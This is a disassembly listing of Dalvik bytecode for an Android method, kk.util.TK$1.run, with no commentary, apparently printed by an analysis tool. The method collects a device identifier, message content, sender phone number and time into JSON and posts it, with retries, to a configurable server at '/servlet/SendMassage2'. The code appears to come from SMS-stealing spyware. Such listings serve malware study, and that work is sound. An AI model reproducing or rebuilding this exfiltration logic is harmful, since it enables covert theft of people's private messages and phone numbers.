# Lkk/util/TK$1;->run()V [access_flags=public]
#
# Parameters:
# local registers: v0...v10
#
# - return:void

run-BB@0x0 : [ run-BB@0xa ]
	0       (00000000) new-instance         v3, Lorg/json/JSONObject;
	1       (00000004) invoke-direct        v3, Lorg/json/JSONObject;-><init>()V

run-BB@0xa : [ run-BB@0x110 ]
	2       (0000000a) const-string         v5, 'mobile'
	3       (0000000e) iget-object          v6, v10, Lkk/util/TK$1;->this$0 Lkk/util/TK;
	4       (00000012) invoke-static        v6, Lkk/util/TK;->access$000(Lkk/util/TK;)Landroid/content/Context;
	5       (00000018) move-result-object   v6
	6       (0000001a) invoke-virtual       v6, Landroid/content/Context;->getApplicationContext()Landroid/content/Context;
	7       (00000020) move-result-object   v6
	8       (00000022) invoke-static        v6, Lkk/util/StUtil;->getMachine(Landroid/content/Context;)Ljava/lang/String;
	9       (00000028) move-result-object   v6
	10      (0000002a) invoke-virtual       v3, v5, v6, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	11      (00000030) const-string         v5, 'content'
	12      (00000034) iget-object          v6, v10, Lkk/util/TK$1;->this$0 Lkk/util/TK;
	13      (00000038) iget-object          v6, v6, Lkk/util/TK;->content Ljava/lang/String;
	14      (0000003c) invoke-virtual       v3, v5, v6, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	15      (00000042) const-string         v5, 'sender'
	16      (00000046) iget-object          v6, v10, Lkk/util/TK$1;->this$0 Lkk/util/TK;
	17      (0000004a) iget-object          v6, v6, Lkk/util/TK;->snedPhone Ljava/lang/String;
	18      (0000004e) invoke-virtual       v3, v5, v6, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	19      (00000054) const-string         v5, 'time'
	20      (00000058) iget-object          v6, v10, Lkk/util/TK$1;->this$0 Lkk/util/TK;
	21      (0000005c) iget-object          v6, v6, Lkk/util/TK;->df Ljava/text/SimpleDateFormat;
	22      (00000060) new-instance         v7, Ljava/util/Date;
	23      (00000064) invoke-direct        v7, Ljava/util/Date;-><init>()V
	24      (0000006a) invoke-virtual       v6, v7, Ljava/text/SimpleDateFormat;->format(Ljava/util/Date;)Ljava/lang/String;
	25      (00000070) move-result-object   v6
	26      (00000072) invoke-virtual       v3, v5, v6, Lorg/json/JSONObject;->put(Ljava/lang/String; Ljava/lang/Object;)Lorg/json/JSONObject;
	27      (00000078) iget-object          v5, v10, Lkk/util/TK$1;->this$0 Lkk/util/TK;
	28      (0000007c) invoke-static        v5, Lkk/util/TK;->access$000(Lkk/util/TK;)Landroid/content/Context;
	29      (00000082) move-result-object   v5
	30      (00000084) new-instance         v6, Ljava/lang/StringBuilder;
	31      (00000088) invoke-direct        v6, Ljava/lang/StringBuilder;-><init>()V
	32      (0000008e) iget-object          v7, v10, Lkk/util/TK$1;->this$0 Lkk/util/TK;
	33      (00000092) iget-object          v7, v7, Lkk/util/TK;->sp Lkk/util/SPUtil;
	34      (00000096) const-string         v8, 'URL'
	35      (0000009a) const-string         v9, ''
	36      (0000009e) invoke-virtual       v7, v8, v9, Lkk/util/SPUtil;->getValue(Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String;
	37      (000000a4) move-result-object   v7
	38      (000000a6) invoke-virtual       v6, v7, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	39      (000000ac) move-result-object   v6
	40      (000000ae) const-string         v7, '/servlet/SendMassage2'
	41      (000000b2) invoke-virtual       v6, v7, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	42      (000000b8) move-result-object   v6
	43      (000000ba) invoke-virtual       v6, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
	44      (000000c0) move-result-object   v6
	45      (000000c2) new-instance         v7, Ljava/lang/StringBuilder;
	46      (000000c6) invoke-direct        v7, Ljava/lang/StringBuilder;-><init>()V
	47      (000000cc) const-string         v8, '{"json":"'
	48      (000000d0) invoke-virtual       v7, v8, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	49      (000000d6) move-result-object   v7
	50      (000000d8) invoke-virtual       v3, Lorg/json/JSONObject;->toString()Ljava/lang/String;
	51      (000000de) move-result-object   v8
	52      (000000e0) invoke-static        v8, Lkk/util/StUtil;->stringToJson(Ljava/lang/String;)Ljava/lang/String;
	53      (000000e6) move-result-object   v8
	54      (000000e8) invoke-virtual       v7, v8, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	55      (000000ee) move-result-object   v7
	56      (000000f0) const-string         v8, '"}'
	57      (000000f4) invoke-virtual       v7, v8, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	58      (000000fa) move-result-object   v7
	59      (000000fc) invoke-virtual       v7, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
	60      (00000102) move-result-object   v7
	61      (00000104) invoke-static        v5, v6, v7, Lkk/util/StUtil;->postJson(Landroid/content/Context; Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String;
	62      (0000010a) move-result-object   v4
	63      (0000010c) const/4              v0, 0
	64      (0000010e) const/4              v2, 0
	a:1bb
	(Lorg/json/JSONException; -> 1c4 run-BB@0x1c4)

run-BB@0x110 : [ run-BB@0x116 run-BB@0x1cc ]
	65      (00000110) const/4              v5, 5
	66      (00000112) if-ge                v2, v5, +5d
	a:1bb
	(Lorg/json/JSONException; -> 1c4 run-BB@0x1c4)

run-BB@0x116 : [ run-BB@0x11a run-BB@0x12a ]
	67      (00000116) if-eqz               v4, +a
	a:1bb
	(Lorg/json/JSONException; -> 1c4 run-BB@0x1c4)

run-BB@0x11a : [ run-BB@0x12a run-BB@0x1cc ]
	68      (0000011a) const-string         v5, '0'
	69      (0000011e) invoke-virtual       v5, v4, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
	70      (00000124) move-result          v5
	71      (00000126) if-eqz               v5, +53
	a:1bb
	(Lorg/json/JSONException; -> 1c4 run-BB@0x1c4)

run-BB@0x12a : [ run-BB@0x110 ]
	72      (0000012a) iget-object          v5, v10, Lkk/util/TK$1;->this$0 Lkk/util/TK;
	73      (0000012e) invoke-static        v5, Lkk/util/TK;->access$000(Lkk/util/TK;)Landroid/content/Context;
	74      (00000134) move-result-object   v5
	75      (00000136) new-instance         v6, Ljava/lang/StringBuilder;
	76      (0000013a) invoke-direct        v6, Ljava/lang/StringBuilder;-><init>()V
	77      (00000140) iget-object          v7, v10, Lkk/util/TK$1;->this$0 Lkk/util/TK;
	78      (00000144) iget-object          v7, v7, Lkk/util/TK;->sp Lkk/util/SPUtil;
	79      (00000148) const-string         v8, 'URL'
	80      (0000014c) const-string         v9, ''
	81      (00000150) invoke-virtual       v7, v8, v9, Lkk/util/SPUtil;->getValue(Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String;
	82      (00000156) move-result-object   v7
	83      (00000158) invoke-virtual       v6, v7, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	84      (0000015e) move-result-object   v6
	85      (00000160) const-string         v7, '/servlet/SendMassage2'
	86      (00000164) invoke-virtual       v6, v7, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	87      (0000016a) move-result-object   v6
	88      (0000016c) invoke-virtual       v6, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
	89      (00000172) move-result-object   v6
	90      (00000174) new-instance         v7, Ljava/lang/StringBuilder;
	91      (00000178) invoke-direct        v7, Ljava/lang/StringBuilder;-><init>()V
	92      (0000017e) const-string         v8, '{"json":"'
	93      (00000182) invoke-virtual       v7, v8, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	94      (00000188) move-result-object   v7
	95      (0000018a) invoke-virtual       v3, Lorg/json/JSONObject;->toString()Ljava/lang/String;
	96      (00000190) move-result-object   v8
	97      (00000192) invoke-static        v8, Lkk/util/StUtil;->stringToJson(Ljava/lang/String;)Ljava/lang/String;
	98      (00000198) move-result-object   v8
	99      (0000019a) invoke-virtual       v7, v8, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	100     (000001a0) move-result-object   v7
	101     (000001a2) const-string         v8, '"}'
	102     (000001a6) invoke-virtual       v7, v8, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
	103     (000001ac) move-result-object   v7
	104     (000001ae) invoke-virtual       v7, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
	105     (000001b4) move-result-object   v7
	106     (000001b6) invoke-static        v5, v6, v7, Lkk/util/StUtil;->postJson(Landroid/content/Context; Ljava/lang/String; Ljava/lang/String;)Ljava/lang/String;
	107     (000001bc) move-result-object   v4
	108     (000001be) add-int/lit8         v2, v2, 1
	109     (000001c2) goto                 -59

run-BB@0x1c4 : [ run-BB@0x1cc ]
	110     (000001c4) move-exception       v1
	111     (000001c6) invoke-virtual       v1, Lorg/json/JSONException;->printStackTrace()V

run-BB@0x1cc : 
	112     (000001cc) return-void          

